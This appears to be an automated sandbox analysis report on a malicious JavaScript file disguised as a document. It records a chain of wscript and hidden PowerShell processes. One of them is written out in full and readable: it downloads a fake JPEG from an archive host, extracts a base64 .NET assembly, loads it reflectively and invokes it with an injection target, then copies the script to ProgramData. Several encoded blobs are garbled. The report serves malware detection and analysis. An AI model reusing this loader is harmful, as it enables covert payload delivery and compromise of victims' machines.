?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB?
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848FF24104_2_00007FF848FF2410
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848FF1BB04_2_00007FF848FF1BB0
        Source: 15514541_Doc_Sub(C-A0893)10-08-2024.jsInitial sample: Strings found which are bigger than 50
        Source: Process Memory Space: powershell.exe PID: 5752, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 6800, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engineClassification label: mal100.expl.evad.winJS@9/5@2/2
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2132:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7080:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mplkwni5.f2l.ps1Jump to behavior
        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: 15514541_Doc_Sub(C-A0893)10-08-2024.jsVirustotal: Detection: 12%
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\15514541_Doc_Sub(C-A0893)10-08-2024.js"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB?
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yks/nimda-pw/eg.osam//:sptth' , '1' , 'C:\ProgramData\' , 'neuromo','AddInProcess32','desativado'))"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\neuromo.js"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?x? ? ? ? ?DY? ? ? ? ?M? ? ? ? ?? ? ? ? ?2? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?MQ? ? ? ? ?w? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?Z? ? ? ? ?Bl? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bo? ? ? ? ?G4? ? ? ? ?bwB0? ? ? ? ?GU? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?v? ? ? ? ?GQ? ? ? ? ?ZQBh? ? ? ? ?HQ? ? ? ? ?a? ? ? ? ?Bu? ? ? ? ?G8? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?C4? ? ? ? ?agBw? ? ? ? ?Gc? ? ? ? ?Jw? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?dwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?TgBl? ? ? ? ?Hc? ? ? ? ?LQBP? ? ? ? ?GI? ? ? ? ?agBl? ? ? ? ?GM? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?TgBl? ? ? ? ?HQ? ? ? ? ?LgBX? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?EI? ? ? ? ?eQB0? ? ? ? ?GU? ? ? ? ?cw? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yks/nimda-pw/eg.osam//:sptth' , '1' , 'C:\ProgramData\' , 'neuromo','AddInProcess32','desativado'))"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.js "C:\ProgramData\neuromo.js"Jump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
